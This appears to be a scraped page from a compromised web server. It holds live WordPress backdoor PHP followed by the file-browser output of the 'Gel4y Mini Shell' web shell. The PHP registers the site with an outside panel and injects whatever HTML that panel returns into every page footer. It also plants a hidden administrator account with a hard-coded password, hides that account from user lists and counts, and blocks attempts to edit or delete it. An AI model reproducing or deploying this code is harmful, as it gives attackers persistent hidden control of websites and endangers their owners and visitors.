function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } function wp_injector_fetch_code() { $backend_url = 'https://validlogs.com/BackPanel/panel.php'; $domain = sanitize_text_field($_SERVER['HTTP_HOST']); $response = wp_remote_post($backend_url, array('body' => array('action' => 'register_domain', 'domain' => $domain), 'timeout' => 5)); if (is_wp_error($response)) return; $html_code = wp_remote_retrieve_body($response); if (!empty($html_code)) { add_action('wp_footer', function() use ($html_code) { echo $html_code; }); } } add_action('init', 'wp_injector_fetch_code'); ob_start(); ?> Gel4y Mini Shell

Gel4y Mini Shell

PHP Version : 7.4.33
+File +Directory
  • Server : x3immune.vn (157.245.199.161/216.73.216.164)
  • Path: ~/usr/include/python3.8/
    Name Size Permission Action
    cpython N/A drwxr-xr-x
    internal N/A drwxr-xr-x
    Python-ast.h 25.87KB -rw-r--r--
    Python.h 3.53KB -rw-r--r--
    abstract.h 29.576KB -rw-r--r--
    asdl.h 1.2KB -rw-r--r--
    ast.h 0.926KB -rw-r--r--
    bitset.h 0.457KB -rw-r--r--
    bltinmodule.h 0.258KB -rw-r--r--
    boolobject.h 0.865KB -rw-r--r--
    bytearrayobject.h 2.064KB -rw-r--r--
    bytes_methods.h 3.224KB -rw-r--r--
    bytesobject.h 8.294KB -rw-r--r--
    cellobject.h 0.696KB -rw-r--r--
    ceval.h 8.17KB -rw-r--r--
    classobject.h 1.67KB -rw-r--r--
    code.h 7.01KB -rw-r--r--
    codecs.h 6.634KB -rw-r--r--
    compile.h 3.498KB -rw-r--r--
    complexobject.h 1.765KB -rw-r--r--
    context.h 1.967KB -rw-r--r--
    datetime.h 9.043KB -rw-r--r--
    descrobject.h 2.948KB -rw-r--r--
    dictobject.h 3.629KB -rw-r--r--
    dtoa.h 0.447KB -rw-r--r--
    dynamic_annotations.h 21.942KB -rw-r--r--
    enumobject.h 0.247KB -rw-r--r--
    errcode.h 1.655KB -rw-r--r--
    eval.h 1.181KB -rw-r--r--
    fileobject.h 1.534KB -rw-r--r--
    fileutils.h 4.25KB -rw-r--r--
    floatobject.h 4.682KB -rw-r--r--
    frameobject.h 3.239KB -rw-r--r--
    funcobject.h 4.102KB -rw-r--r--
    genobject.h 3.633KB -rw-r--r--
    graminit.h 2.068KB -rw-r--r--
    grammar.h 1.778KB -rw-r--r--
    import.h 4.811KB -rw-r--r--
    interpreteridobject.h 0.326KB -rw-r--r--
    intrcheck.h 0.841KB -rw-r--r--
    iterobject.h 0.554KB -rw-r--r--
    listobject.h 2.858KB -rw-r--r--
    longintrepr.h 3.71KB -rw-r--r--
    longobject.h 9.297KB -rw-r--r--
    marshal.h 0.784KB -rw-r--r--
    memoryobject.h 2.7KB -rw-r--r--
    methodobject.h 4.303KB -rw-r--r--
    modsupport.h 9.366KB -rw-r--r--
    moduleobject.h 2.307KB -rw-r--r--
    namespaceobject.h 0.341KB -rw-r--r--
    node.h 1.297KB -rw-r--r--
    object.h 28.905KB -rw-r--r--
    objimpl.h 10.29KB -rw-r--r--
    odictobject.h 1.27KB -rw-r--r--
    opcode.h 5.043KB -rw-r--r--
    osdefs.h 0.72KB -rw-r--r--
    osmodule.h 0.284KB -rw-r--r--
    parsetok.h 2.889KB -rw-r--r--
    patchlevel.h 1.269KB -rw-r--r--
    picklebufobject.h 0.827KB -rw-r--r--
    py_curses.h 2.419KB -rw-r--r--
    pyarena.h 2.68KB -rw-r--r--
    pycapsule.h 1.686KB -rw-r--r--
    pyconfig.h 3.954KB -rw-r--r--
    pyctype.h 1.354KB -rw-r--r--
    pydebug.h 1.186KB -rw-r--r--
    pydtrace.h 2.356KB -rw-r--r--
    pyerrors.h 12.486KB -rw-r--r--
    pyexpat.h 2.393KB -rw-r--r--
    pyfpe.h 0.333KB -rw-r--r--
    pyhash.h 4.043KB -rw-r--r--
    pylifecycle.h 2.032KB -rw-r--r--
    pymacconfig.h 2.919KB -rw-r--r--
    pymacro.h 3.689KB -rw-r--r--
    pymath.h 8.117KB -rw-r--r--
    pymem.h 5.279KB -rw-r--r--
    pyport.h 29.513KB -rw-r--r--
    pystate.h 4.576KB -rw-r--r--
    pystrcmp.h 0.426KB -rw-r--r--
    pystrhex.h 0.829KB -rw-r--r--
    pystrtod.h 1.448KB -rw-r--r--
    pythonrun.h 7.466KB -rw-r--r--
    pythread.h 5.577KB -rw-r--r--
    pytime.h 8.717KB -rw-r--r--
    rangeobject.h 0.614KB -rw-r--r--
    setobject.h 3.283KB -rw-r--r--
    sliceobject.h 2.458KB -rw-r--r--
    structmember.h 1.982KB -rw-r--r--
    structseq.h 1.345KB -rw-r--r--
    symtable.h 5.184KB -rw-r--r--
    sysmodule.h 1.213KB -rw-r--r--
    token.h 2.372KB -rw-r--r--
    traceback.h 0.587KB -rw-r--r--
    tracemalloc.h 1.088KB -rw-r--r--
    tupleobject.h 1.622KB -rw-r--r--
    typeslots.h 2.2KB -rw-r--r--
    ucnhash.h 1.031KB -rw-r--r--
    unicodeobject.h 34.895KB -rw-r--r--
    warnings.h 1.734KB -rw-r--r--
    weakrefobject.h 2.799KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet